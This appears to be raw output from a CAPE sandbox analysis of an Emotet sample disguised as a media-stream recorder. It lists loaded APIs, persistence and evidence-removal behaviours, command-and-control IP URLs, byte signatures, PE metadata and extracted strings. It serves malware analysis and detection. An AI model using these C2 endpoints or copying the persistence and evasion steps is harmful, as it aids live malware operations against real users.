DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ADVAPI32.dll/RegDeleteTreeA
DynamicLoader: ADVAPI32.dll/RegDeleteTreeW
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: iphlpapi.DLL/GetAdaptersAddresses
DynamicLoader: DHCPCSVC.DLL/DhcpRequestParams
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: CRYPTSP.dll/CryptDecrypt
DynamicLoader: CRYPTSP.dll/CryptVerifySignatureW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: wersvc.dll/ServiceMain
DynamicLoader: wersvc.dll/SvchostPushServiceGlobals
DynamicLoader: ADVAPI32.dll/RegGetValueW
DynamicLoader: sechost.dll/ConvertStringSecurityDescriptorToSecurityDescriptorW
DynamicLoader: faultrep.dll/WerpInitiateCrashReporting
DynamicLoader: wer.dll/WerpCreateMachineStore
DynamicLoader: SHELL32.dll/SHGetFolderPathEx
DynamicLoader: ole32.dll/StringFromGUID2
DynamicLoader: profapi.dll/
DynamicLoader: USERENV.dll/CreateEnvironmentBlock
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: SspiCli.dll/GetUserNameExW
DynamicLoader: USERENV.dll/DestroyEnvironmentBlock
DynamicLoader: LPK.dll/LpkEditControl
DynamicLoader: IMM32.dll/ImmDisableIME
DynamicLoader: PSAPI.DLL/GetModuleFileNameExW
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeW
DynamicLoader: VERSION.dll/GetFileVersionInfoW
DynamicLoader: VERSION.dll/VerQueryValueW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: wer.dll/WerpCreateIntegratorReportId
DynamicLoader: wer.dll/WerReportCreate
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: wer.dll/WerpSetIntegratorReportId
DynamicLoader: wer.dll/WerReportSetParameter
DynamicLoader: dbgeng.dll/DebugCreate
DynamicLoader: ntdll.dll/CsrGetProcessId
DynamicLoader: ntdll.dll/DbgBreakPoint
DynamicLoader: ntdll.dll/DbgPrint
DynamicLoader: ntdll.dll/DbgPrompt
DynamicLoader: ntdll.dll/DbgUiConvertStateChangeStructure
DynamicLoader: ntdll.dll/DbgUiGetThreadDebugObject
DynamicLoader: ntdll.dll/DbgUiIssueRemoteBreakin
DynamicLoader: ntdll.dll/DbgUiSetThreadDebugObject
DynamicLoader: ntdll.dll/NtAllocateVirtualMemory
DynamicLoader: ntdll.dll/NtClose
DynamicLoader: ntdll.dll/NtCreateDebugObject
DynamicLoader: ntdll.dll/NtCreateFile
DynamicLoader: ntdll.dll/NtDebugActiveProcess
DynamicLoader: ntdll.dll/NtDebugContinue
DynamicLoader: ntdll.dll/NtFreeVirtualMemory
DynamicLoader: ntdll.dll/NtOpenProcess
DynamicLoader: ntdll.dll/NtOpenThread
DynamicLoader: ntdll.dll/NtQueryInformationProcess
DynamicLoader: ntdll.dll/NtQueryInformationThread
DynamicLoader: ntdll.dll/NtQueryMutant
DynamicLoader: ntdll.dll/NtQueryObject
DynamicLoader: ntdll.dll/NtQuerySystemInformation
DynamicLoader: ntdll.dll/NtRemoveProcessDebug
DynamicLoader: ntdll.dll/NtResumeThread
DynamicLoader: ntdll.dll/NtSetInformationDebugObject
DynamicLoader: ntdll.dll/NtSetInformationProcess
DynamicLoader: ntdll.dll/NtSystemDebugControl
DynamicLoader: ntdll.dll/NtWaitForDebugEvent
DynamicLoader: ntdll.dll/RtlAnsiStringToUnicodeString
DynamicLoader: ntdll.dll/RtlCreateProcessParameters
DynamicLoader: ntdll.dll/RtlCreateUserProcess
DynamicLoader: ntdll.dll/RtlDestroyProcessParameters
DynamicLoader: ntdll.dll/RtlDosPathNameToNtPathName_U
DynamicLoader: ntdll.dll/RtlFindMessage
DynamicLoader: ntdll.dll/RtlFreeHeap
DynamicLoader: ntdll.dll/RtlFreeUnicodeString
DynamicLoader: ntdll.dll/RtlGetFunctionTableListHead
DynamicLoader: ntdll.dll/RtlGetUnloadEventTrace
DynamicLoader: ntdll.dll/RtlGetUnloadEventTraceEx
DynamicLoader: ntdll.dll/RtlInitAnsiString
DynamicLoader: ntdll.dll/RtlInitUnicodeString
DynamicLoader: ntdll.dll/RtlTryEnterCriticalSection
DynamicLoader: ntdll.dll/RtlUnicodeStringToAnsiString
DynamicLoader: ntdll.dll/NtOpenProcessToken
DynamicLoader: ntdll.dll/NtOpenThreadToken
DynamicLoader: ntdll.dll/NtQueryInformationToken
DynamicLoader: kernel32.dll/CloseProfileUserMapping
DynamicLoader: kernel32.dll/CreateToolhelp32Snapshot
DynamicLoader: kernel32.dll/DebugActiveProcessStop
DynamicLoader: kernel32.dll/DebugBreak
DynamicLoader: kernel32.dll/DebugBreakProcess
DynamicLoader: kernel32.dll/DebugSetProcessKillOnExit
DynamicLoader: kernel32.dll/Module32First
DynamicLoader: kernel32.dll/Module32FirstW
DynamicLoader: kernel32.dll/Module32Next
DynamicLoader: kernel32.dll/Module32NextW
DynamicLoader: kernel32.dll/OpenThread
DynamicLoader: kernel32.dll/Process32First
DynamicLoader: kernel32.dll/Process32FirstW
DynamicLoader: kernel32.dll/Process32Next
DynamicLoader: kernel32.dll/Process32NextW
DynamicLoader: kernel32.dll/ProcessIdToSessionId
DynamicLoader: kernel32.dll/SetProcessShutdownParameters
DynamicLoader: kernel32.dll/Thread32First
DynamicLoader: kernel32.dll/Thread32Next
DynamicLoader: kernel32.dll/GetTimeZoneInformation
DynamicLoader: kernel32.dll/DuplicateHandle
DynamicLoader: kernel32.dll/Wow64GetThreadSelectorEntry
DynamicLoader: ADVAPI32.dll/CloseServiceHandle
DynamicLoader: ADVAPI32.dll/ControlService
DynamicLoader: ADVAPI32.dll/CreateServiceA
DynamicLoader: ADVAPI32.dll/CreateServiceW
DynamicLoader: ADVAPI32.dll/DeleteService
DynamicLoader: ADVAPI32.dll/EnumServicesStatusExA
DynamicLoader: ADVAPI32.dll/EnumServicesStatusExW
DynamicLoader: ADVAPI32.dll/GetEventLogInformation
DynamicLoader: ADVAPI32.dll/GetTokenInformation
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: ADVAPI32.dll/OpenProcessToken
DynamicLoader: ADVAPI32.dll/OpenSCManagerA
DynamicLoader: ADVAPI32.dll/OpenSCManagerW
DynamicLoader: ADVAPI32.dll/OpenServiceA
DynamicLoader: ADVAPI32.dll/OpenServiceW
DynamicLoader: ADVAPI32.dll/StartServiceA
DynamicLoader: ADVAPI32.dll/StartServiceW
DynamicLoader: ADVAPI32.dll/GetSidSubAuthority
DynamicLoader: ADVAPI32.dll/GetSidSubAuthorityCount
DynamicLoader: VERSION.dll/GetFileVersionInfoSizeExW
DynamicLoader: VERSION.dll/GetFileVersionInfoExW
DynamicLoader: dbghelp.dll/DebugExtensionInitialize
DynamicLoader: dbghelp.dll/WinDbgExtensionDllInit
DynamicLoader: dbghelp.dll/ExtensionApiVersion
DynamicLoader: dbghelp.dll/CheckVersion
DynamicLoader: wer.dll/WerpSetDynamicParameter
DynamicLoader: wer.dll/WerReportAddDump
DynamicLoader: wer.dll/WerpSetCallBack
DynamicLoader: wer.dll/WerReportSetUIOption
DynamicLoader: wer.dll/WerpAddRegisteredDataToReport
DynamicLoader: wer.dll/WerReportSubmit
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegGetValueW
DynamicLoader: USER32.dll/LoadStringW
DynamicLoader: ADVAPI32.dll/AllocateAndInitializeSid
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: USER32.dll/GetProcessWindowStation
DynamicLoader: USER32.dll/GetThreadDesktop
DynamicLoader: USER32.dll/GetUserObjectInformationW
DynamicLoader: ADVAPI32.dll/FreeSid
DynamicLoader: SensApi.dll/IsNetworkAlive
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: USER32.dll/CharUpperW
DynamicLoader: werui.dll/WerUICreate
DynamicLoader: werui.dll/WerUIStart
DynamicLoader: ole32.dll/CoInitialize
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: OLEAUT32.dll/
DynamicLoader: DUI70.dll/InitProcessPriv
DynamicLoader: COMCTL32.dll/LoadIconWithScaleDown
DynamicLoader: ntdll.dll/RtlRunEncodeUnicodeString
DynamicLoader: ntdll.dll/RtlInitUnicodeString
DynamicLoader: ntdll.dll/RtlRunDecodeUnicodeString
DynamicLoader: DUI70.dll/InitThread
DynamicLoader: DUser.dll/InitGadgets
DynamicLoader: USER32.dll/RegisterMessagePumpHook
DynamicLoader: DUI70.dll/?GetClassInfoPtr@CCBase@DirectUI@@SAPEAUIClassInfo@2@XZ
DynamicLoader: DUI70.dll/?GetFactoryLock@Element@DirectUI@@SAPEAU_RTL_CRITICAL_SECTION@@XZ
DynamicLoader: DUI70.dll/??0CritSecLock@DirectUI@@QEAA@PEAU_RTL_CRITICAL_SECTION@@@Z
DynamicLoader: DUI70.dll/?ClassExist@ClassInfoBase@DirectUI@@SA_NPEAPEAUIClassInfo@2@PEBQEBUPropertyInfo@2@IPEAU32@PEAUHINSTANCE__@@PEBG_N@Z
DynamicLoader: DUI70.dll/??0ClassInfoBase@DirectUI@@QEAA@XZ
DynamicLoader: DUI70.dll/?Initialize@ClassInfoBase@DirectUI@@QEAAJPEAUHINSTANCE__@@PEBG_NPEBQEBUPropertyInfo@2@I@Z
DynamicLoader: DUI70.dll/?Register@ClassInfoBase@DirectUI@@QEAAJXZ
DynamicLoader: DUI70.dll/?IsGlobal@ClassInfoBase@DirectUI@@UEBA_NXZ
DynamicLoader: DUI70.dll/?GetName@ClassInfoBase@DirectUI@@UEBAPEBGXZ
DynamicLoader: DUI70.dll/?GetModule@ClassInfoBase@DirectUI@@UEBAPEAUHINSTANCE__@@XZ
DynamicLoader: DUI70.dll/??1CritSecLock@DirectUI@@QEAA@XZ
DynamicLoader: DUI70.dll/??0CCBase@DirectUI@@QEAA@KPEBG@Z
DynamicLoader: DUI70.dll/?Initialize@CCBase@DirectUI@@QEAAJIPEAVElement@2@PEAK@Z
DynamicLoader: DUser.dll/CreateGadget
DynamicLoader: DUser.dll/SetGadgetMessageFilter
DynamicLoader: DUser.dll/SetGadgetStyle
DynamicLoader: DUI70.dll/?OnPropertyChanging@Element@DirectUI@@UEAA_NPEBUPropertyInfo@2@HPEAVValue@2@1@Z
DynamicLoader: DUI70.dll/?HandleUiaPropertyChangingListener@Element@DirectUI@@UEAAXPEBUPropertyInfo@2@@Z
DynamicLoader: DUI70.dll/?HandleUiaPropertyListener@Element@DirectUI@@UEAAXPEBUPropertyInfo@2@HPEAVValue@2@1@Z
DynamicLoader: DUI70.dll/?DirectionProp@Element@DirectUI@@SAPEBUPropertyInfo@2@XZ
DynamicLoader: DUI70.dll/?OnPropertyChanged@CCBase@DirectUI@@UEAAXPEBUPropertyInfo@2@HPEAVValue@2@1@Z
DynamicLoader: DUI70.dll/?SetFontSize@Element@DirectUI@@QEAAJH@Z
DynamicLoader: DUI70.dll/?SetWidth@Element@DirectUI@@QEAAJH@Z
DynamicLoader: DUI70.dll/?SetHeight@Element@DirectUI@@QEAAJH@Z
DynamicLoader: DUI70.dll/?EndDefer@Element@DirectUI@@QEAAXK@Z
DynamicLoader: DUI70.dll/?OnGroupChanged@Element@DirectUI@@UEAAXH_N@Z
DynamicLoader: DUser.dll/InvalidateGadget
DynamicLoader: DUI70.dll/CreateDUIWrapper
DynamicLoader: SHELL32.dll/ExtractIconExW
DynamicLoader: COMCTL32.dll/TaskDialogIndirect
DynamicLoader: COMCTL32.dll/LoadIconWithScaleDown
DynamicLoader: ntdll.dll/RtlRunEncodeUnicodeString
DynamicLoader: ntdll.dll/RtlInitUnicodeString
DynamicLoader: ntdll.dll/RtlRunDecodeUnicodeString
DynamicLoader: DUser.dll/InitGadgets
DynamicLoader: UxTheme.dll/IsThemeActive
DynamicLoader: DUser.dll/CreateGadget
DynamicLoader: DUser.dll/DisableContainerHwnd
DynamicLoader: DUser.dll/DUserFlushMessages
DynamicLoader: DUser.dll/DUserFlushDeferredMessages
DynamicLoader: DUser.dll/DeleteHandle
DynamicLoader: DUI70.dll/UnInitThread
DynamicLoader: DUser.dll/DUserFlushMessages
DynamicLoader: DUser.dll/DUserFlushDeferredMessages
DynamicLoader: DUser.dll/DeleteHandle
DynamicLoader: DUI70.dll/?MessageCallback@HWNDHost@DirectUI@@UEAAIPEAUtagGMSG@@@Z
DynamicLoader: DUI70.dll/?HandleUiaDestroyListener@Element@DirectUI@@UEAAXXZ
DynamicLoader: DUI70.dll/?OnDestroy@HWNDHost@DirectUI@@UEAAXXZ
DynamicLoader: DUI70.dll/??1CCBase@DirectUI@@UEAA@XZ
DynamicLoader: USER32.dll/UnregisterMessagePumpHook
DynamicLoader: DUI70.dll/UnInitProcessPriv
DynamicLoader: DUI70.dll/?Release@ClassInfoBase@DirectUI@@UEAAHXZ
DynamicLoader: DUI70.dll/?GetGlobalIndex@ClassInfoBase@DirectUI@@UEBAIXZ
DynamicLoader: DUI70.dll/??1ClassInfoBase@DirectUI@@UEAA@XZ
DynamicLoader: COMCTL32.dll/LoadIconWithScaleDown
DynamicLoader: ntdll.dll/RtlRunEncodeUnicodeString
DynamicLoader: ntdll.dll/RtlInitUnicodeString
DynamicLoader: ntdll.dll/RtlRunDecodeUnicodeString
DynamicLoader: USER32.dll/RegisterMessagePumpHook
DynamicLoader: USER32.dll/UnregisterMessagePumpHook
DynamicLoader: werui.dll/WerUIUpdateUIForState
DynamicLoader: ADVAPI32.dll/RegCreateKeyExW
DynamicLoader: ADVAPI32.dll/RegSetValueExW
Performs HTTP requests potentially not found in PCAP.
url: 94.183.71.206:7080/devices/loadan/
url: 91.83.93.105:8080/taskbar/
url: 91.83.93.105:8080/publish/
url: 91.83.93.105:8080/attrib/forced/
url: 91.83.93.105:8080/prov/
url: 91.83.93.105:8080/health/teapot/
url: 91.83.93.105:8080/sess/balloon/tpt/merge/
url: 91.83.93.105:8080/merge/
url: 91.83.93.105:8080/scripts/teapot/site/
url: 91.83.93.105:8080/arizona/
url: 91.83.93.105:8080/forced/prov/health/
url: 91.83.93.105:8080/srvc/xian/
url: 91.83.93.105:8080/entries/
url: 91.83.93.105:8080/chunk/between/odbc/
url: 125.99.61.162:7080/stubs/ringin/
Repeatedly searches for a not-found process, may want to run with startbrowser=1 option
CAPE extracted potentially suspicious content
ygg9ytft62s5ip.exe: Emotet Payload
ygg9ytft62s5ip.exe: [{u'strings': [u'{ 6A 13 68 01 00 01 00 FF 15 58 17 41 00 85 C0 }', u'{ 33 C0 21 05 5C 39 41 00 A3 58 39 41 00 39 05 90 03 41 00 74 18 40 A3 58 39 41 00 83 3C C5 90 03 41 00 00 75 F0 51 E8 FD BE FF FF 59 C3 }'], u'meta': {u'cape_type': u'Emotet Payload', u'description': u'Emotet Payload', u'author': u'kevoreilly'}, u'addresses': {u'snippet6': 21716L, u'snippet2': 5037L}, u'name': u'Emotet'}]
ygg9ytft62s5ip.exe: Emotet Payload
ygg9ytft62s5ip.exe: [{u'strings': [u'{ 6A 13 68 01 00 01 00 FF 15 58 17 41 00 85 C0 }', u'{ 33 C0 21 05 5C 39 41 00 A3 58 39 41 00 39 05 90 03 41 00 74 18 40 A3 58 39 41 00 83 3C C5 90 03 41 00 00 75 F0 51 E8 FD BE FF FF 59 C3 }'], u'meta': {u'cape_type': u'Emotet Payload', u'description': u'Emotet Payload', u'author': u'kevoreilly'}, u'addresses': {u'snippet6': 21716L, u'snippet2': 5037L}, u'name': u'Emotet'}]
Drops a binary and executes it
binary: C:\Windows\SysWOW64\prepmspterm.exe
HTTP traffic contains suspicious features which may be indicative of malware related traffic
ip_hostname: HTTP connection was made to an IP address rather than domain name
suspicious_request: http://91.83.93.105:8080/taskbar/
suspicious_request: http://91.83.93.105:8080/publish/
suspicious_request: http://91.83.93.105:8080/attrib/forced/
suspicious_request: http://91.83.93.105:8080/prov/
suspicious_request: http://91.83.93.105:8080/health/teapot/
suspicious_request: http://91.83.93.105:8080/sess/balloon/tpt/merge/
suspicious_request: http://91.83.93.105:8080/merge/
suspicious_request: http://91.83.93.105:8080/scripts/teapot/site/
suspicious_request: http://91.83.93.105:8080/arizona/
suspicious_request: http://91.83.93.105:8080/forced/prov/health/
suspicious_request: http://91.83.93.105:8080/srvc/xian/
suspicious_request: http://91.83.93.105:8080/entries/
suspicious_request: http://91.83.93.105:8080/chunk/between/odbc/
Performs some HTTP requests
url: http://91.83.93.105:8080/taskbar/
url: http://91.83.93.105:8080/publish/
url: http://91.83.93.105:8080/attrib/forced/
url: http://91.83.93.105:8080/prov/
url: http://91.83.93.105:8080/health/teapot/
url: http://91.83.93.105:8080/sess/balloon/tpt/merge/
url: http://91.83.93.105:8080/merge/
url: http://91.83.93.105:8080/scripts/teapot/site/
url: http://91.83.93.105:8080/arizona/
url: http://91.83.93.105:8080/forced/prov/health/
url: http://91.83.93.105:8080/srvc/xian/
url: http://91.83.93.105:8080/entries/
url: http://91.83.93.105:8080/chunk/between/odbc/
Deletes its original binary from disk
Attempts to remove evidence of file being downloaded from the Internet
file: C:\Windows\SysWOW64\prepmspterm.exe:Zone.Identifier
Installs itself for autorun at Windows startup
service name: prepmspterm
service path: "C:\Windows\SysWOW64\prepmspterm.exe"
Installs itself for autorun at Windows startup
service name: prepmspterm
service path: "C:\Windows\SysWOW64\prepmspterm.exe"
CAPE detected the Emotet malware family
Creates a copy of itself
copy: C:\Windows\SysWOW64\prepmspterm.exe
Anomalous binary characteristics
anomaly: Actual checksum does not match that reported in PE header

Screenshots


Hosts

Direct IP Country Name
Y 94.183.71.206 [VT] Iran, Islamic Republic of
Y 91.83.93.105 [VT] Hungary
Y 125.99.61.162 [VT] India

DNS

No domains contacted.


Summary

PE Information

Image Base 0x00400000
Entry Point 0x00407dd3
Reported Checksum 0x0009e705
Actual Checksum 0x000a1768
Minimum OS Version 5.0
Compile Time 2019-10-06 18:27:14
Import Hash 8740bde339723d73ad60369c868b5940
Exported DLL Name MHMS.exe

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x000076e3 0x00007800 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.20
.rdata 0x00009000 0x000021bf 0x00002200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.35
.data 0x0000c000 0x000006c0 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 1.27
.rsrc 0x0000d000 0x0008e686 0x0008e800 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 4.63

Overlay

Offset 0x00098800
Size 0x00000003

Imports

Library COMCTL32.dll:
0x409000 None
0x409004 ImageList_Add
0x409008 ImageList_Create
Library COMDLG32.dll:
0x409014 GetSaveFileNameA
Library WS2_32.dll:
0x409264 send
0x409268 socket
0x40926c htons
0x409270 setsockopt
0x409274 connect
0x409278 WSAStartup
0x40927c WSAGetLastError
0x409280 gethostname
0x409284 gethostbyname
0x409288 inet_ntoa
0x40928c recv
0x409290 WSACleanup
0x409294 closesocket
Library KERNEL32.dll:
0x40904c Sleep
0x409054 GetModuleFileNameA
0x409058 FindClose
0x40905c FindFirstFileA
0x409060 GetDriveTypeA
0x409070 GetModuleHandleA
0x409074 GlobalReAlloc
0x409078 GlobalUnlock
0x40907c GlobalLock
0x409080 GlobalAlloc
0x409084 InterlockedExchange
0x40908c GetCurrentProcessId
0x409090 GetCurrentThreadId
0x409094 GetTickCount
0x40909c IsDebuggerPresent
0x4090a8 GetCurrentProcess
0x4090ac TerminateProcess
0x4090b0 GetStartupInfoA
Library USER32.dll:
0x4091c0 RegisterClassExA
0x4091c4 LoadCursorA
0x4091c8 LoadIconA
0x4091cc SendMessageA
0x4091d0 EnableWindow
0x4091d4 CreateWindowExA
0x4091d8 GetWindowRect
0x4091dc DestroyWindow
0x4091e0 SetWindowPos
0x4091e4 GetCursorPos
0x4091e8 ReleaseDC
0x4091ec GetDC
0x4091f0 LoadBitmapA
0x4091f4 CreatePopupMenu
0x4091f8 AppendMenuA
0x4091fc TrackPopupMenu
0x409200 LoadImageA
0x409204 SetWindowRgn
0x409208 CreateDialogParamA
0x40920c SetCursor
0x409210 BeginPaint
0x409214 EndPaint
0x409218 SetCapture
0x40921c GetClientRect
0x409220 ReleaseCapture
0x409224 CallWindowProcA
0x409228 SetWindowLongA
0x40922c MessageBoxA
0x409230 GetDlgItem
0x409234 SetFocus
0x409238 DefWindowProcA
0x40923c PostQuitMessage
0x409240 GetMessageA
0x409244 TranslateMessage
0x409248 DispatchMessageA
0x40924c IsDialogMessageA
0x409250 LoadStringW
0x409254 ShowWindow
0x409258 GetDesktopWindow
0x40925c SetRect
Library GDI32.dll:
0x40901c GetStockObject
0x409020 CreateDIBSection
0x409024 GetPixel
0x409028 ExtCreateRegion
0x40902c CombineRgn
0x409030 DeleteObject
0x409034 GetObjectA
0x409038 CreateCompatibleDC
0x40903c SelectObject
0x409040 DeleteDC
0x409044 BitBlt
Library SHELL32.dll:
0x4091b8 ShellExecuteA
Library MSVCR90.dll:
0x4090cc _decode_pointer
0x4090d0 _onexit
0x4090d4 _lock
0x4090d8 __dllonexit
0x4090dc _unlock
0x4090e0 _invoke_watson
0x4090e4 ?terminate@@YAXXZ
0x4090e8 _crt_debugger_hook
0x4090ec __set_app_type
0x4090f0 _encode_pointer
0x4090f4 __p__fmode
0x4090f8 __p__commode
0x4090fc _adjust_fdiv
0x409100 __setusermatherr
0x409104 _configthreadlocale
0x409108 _initterm_e
0x40910c _initterm
0x409110 _acmdln
0x409114 exit
0x409118 _ismbblead
0x40911c _XcptFilter
0x409120 _exit
0x409124 _cexit
0x409128 __getmainargs
0x40912c _amsg_exit
0x409130 _beginthread
0x409134 fwrite
0x409138 fflush
0x40913c _flushall
0x409140 _endthread
0x409144 __CxxFrameHandler3
0x409148 isdigit
0x40914c feof
0x409150 fgets
0x409154 strncmp
0x409158 atoi
0x40915c fprintf
0x409160 fopen
0x409164 _controlfp_s
0x409168 _itoa
0x409170 _stricmp
0x409174 strstr
0x409178 _splitpath
0x40917c ??3@YAXPAX@Z
0x409180 sprintf
0x409184 ??2@YAPAXI@Z
0x409188 atol
0x40918c memset
0x409190 fclose
0x409194 strerror
0x409198 _errno
0x40919c isspace
0x4091a0 _difftime64
0x4091a4 _time64
0x4091a8 memcpy
0x4091ac _wtoi
0x4091b0 _wcslwr

Exports

Ordinal Address Name
1 0x4034e0 Run
.text
`.rdata
@.data
.rsrc
T$ Rj
D$(VPj
:t:="*
SUVWhzk
Whpi@
MHMS_Popup
MHMS_Main
Monkey Head Media Stream
bad allocation
%s%s%s
Item Count: %i
%s%s%s_%04i%s
config.ini
urlbookmarks
urlhistory.txt
help\
RECV_THROTTLE
RECV_MAX_BUFFER
TIMEOUT
WINSOCK
AGENT_NAME
TRACK_SEPERATION
WINDOW_ON_TOP
tooltips_class32
Host Unknown
Unspecified network error occurred!
Host not found!
Network subsystem is unavailable!
No route to host!
Host is unavailable!
Connection refused!
Connection timed out!
No buffer space available!
Connection reset by peer!
Software caused connection abort!
Network dropped connection on reset!
Network is unreachable!
Network is down!
Too many open sockets
Network Error:
%02d:%02d:%02d
StreamTitle='
Enter new bookmark information and click the 'Ok' button to save your information.
You must select an item to edit.
Update bookmark information and click the 'Ok' button to save your information.
Specify output filename:
*.mp3
All Files
Could not open help.chm
help.chm
Error! Failed to locate correct version of the Winsock DLL!
icy-notice2:
icy-notice1:
Content-Type:
icy-url:
icy-genre:
icy-name:
icy-br:
icy-metaint:
%s%sPartialTrack%s
%s%s%s%s
Failed to update bookmark!
You must select an item to delete.
Failed to delete list item!
Are you sure you wish to delete the "%s" item?
Are you sure you wish to delete the media stream URL history?
http://www.monkeyheadsoftware.com/default.asp?app=Y
You must specify a valid stream URL! ex, (http://www.somehost.com:8000/stream/1011)
You must specify a valid stream URL!
You must enter a stream name!
No bookmarks available.
You must select an item first.
A stream is currently being recorded. You must stop the current media stream before proceeding.
%s exists! Do you wish to overwrite this file?
%s exists. Do you wish to overwrite this file?
Invalid filepath! Ensure the specified directory exists!
You must specify a valid destination filename.
File:
Track:
Saved %iK Bytes in %s (hh:mm:ss)
Media stream stopped.
Connection Lost!
Failed to open MP3 file! Ensure all open media files are closed.
Specified number of recording minutes ellapsed.
Failed to open file " %s ". This file may be opened by another application.
Max number of bytes specified has been saved..
@ File Error! Ensure file is closed and check diskspace!
Display application information
Display help file
Application settings
Display bookmarks
Acquire media stream
Visit Monkey Head Software's Home Page!
Minimize window
Close Application
Stream acquisition cancelled!
Contact software provider if this issue persists.
Validate the specified URL or check your Internet connection.
Stream capture classes initialized..
Please wait.. Connecting to remote server..
Delete Bookmark
Edit Bookmark
Get Stream
Stream URL
Stream Name
http://www.monkeyheadsoftware.com?psc=Y
Status: Connecting to media server..
Failed to initialize application! Contact software prodiver if this condition persists!
Failed to load application configuration data! Check config.ini file! If your config file is corrupt, simply delete it and restart the application. The file will be recreated upon restart.
InitCommonControlsEx
ImageList_Add
ImageList_Create
COMCTL32.dll
GetSaveFileNameA
COMDLG32.dll
WS2_32.dll
GetModuleFileNameA
FindClose
FindFirstFileA
GetDriveTypeA
GetPrivateProfileStringA
GetPrivateProfileIntA
WritePrivateProfileStringA
GetModuleHandleA
GlobalReAlloc
GlobalUnlock
GlobalLock
GlobalAlloc
Sleep
KERNEL32.dll
RegisterClassExA
LoadCursorA
LoadIconA
SendMessageA
EnableWindow
CreateWindowExA
GetWindowRect
DestroyWindow
SetWindowPos
GetCursorPos
ReleaseDC
GetDC
SetRect
GetDesktopWindow
ShowWindow
LoadStringW
IsDialogMessageA
DispatchMessageA
TranslateMessage
GetMessageA
PostQuitMessage
DefWindowProcA
SetFocus
GetDlgItem
MessageBoxA
SetWindowLongA
CallWindowProcA
ReleaseCapture
GetClientRect
SetCapture
EndPaint
BeginPaint
SetCursor
CreateDialogParamA
SetWindowRgn
LoadImageA
TrackPopupMenu
AppendMenuA
CreatePopupMenu
LoadBitmapA
USER32.dll
BitBlt
DeleteDC
SelectObject
CreateCompatibleDC
GetObjectA
DeleteObject
CombineRgn
ExtCreateRegion
GetPixel
CreateDIBSection
GetStockObject
GDI32.dll
ShellExecuteA
SHELL32.dll
??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ
??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_WI@Z
??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@XZ
MSVCP90.dll
strstr
_splitpath
??3@YAXPAX@Z
sprintf
??2@YAPAXI@Z
memset
fclose
strerror
_errno
isspace
_difftime64
_time64
memcpy
_wtoi
_wcslwr
fopen
fprintf
strncmp
fgets
isdigit
__CxxFrameHandler3
_endthread
_flushall
fflush
fwrite
_beginthread
MSVCR90.dll
_amsg_exit
__getmainargs
_cexit
_exit
_XcptFilter
_ismbblead
_acmdln
_initterm
_initterm_e
_configthreadlocale
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
_encode_pointer
__set_app_type
_crt_debugger_hook
?terminate@@YAXXZ
?_type_info_dtor_internal_method@type_info@@QAEXXZ
_unlock
__dllonexit
_lock
_onexit
_decode_pointer
_except_handler4_common
_invoke_watson
_controlfp_s
InterlockedExchange
InterlockedCompareExchange
GetStartupInfoA
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsDebuggerPresent
QueryPerformanceCounter
GetTickCount
GetCurrentThreadId
GetCurrentProcessId
GetSystemTimeAsFileTime
_itoa
_stricmp
MHMS.exe
.?AVCGuiElement@@
.?AVtype_info@@
YY\\\`bbiiiib
&***Cf
N303Hj
" .25POTl
$1=<>;Uk
9@Q@BWn
M',CEREEYn
7HHSGGZo
'(CHHHHH^o
sHKKLV\^bbbem
cHRM
bRV.~
Q~)|6
~d4\-
oW Prd
ert^k
`0lZ?
N@@@
"4%oh
/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/4E&DD9D'JJ*#FCF5-C'/CFAF4#HG/D*J&A/P$P!D
</assembly>
MS Sans Serif
MS Sans Serif
Media stream &URL:
Destination File&path:
&Browse..
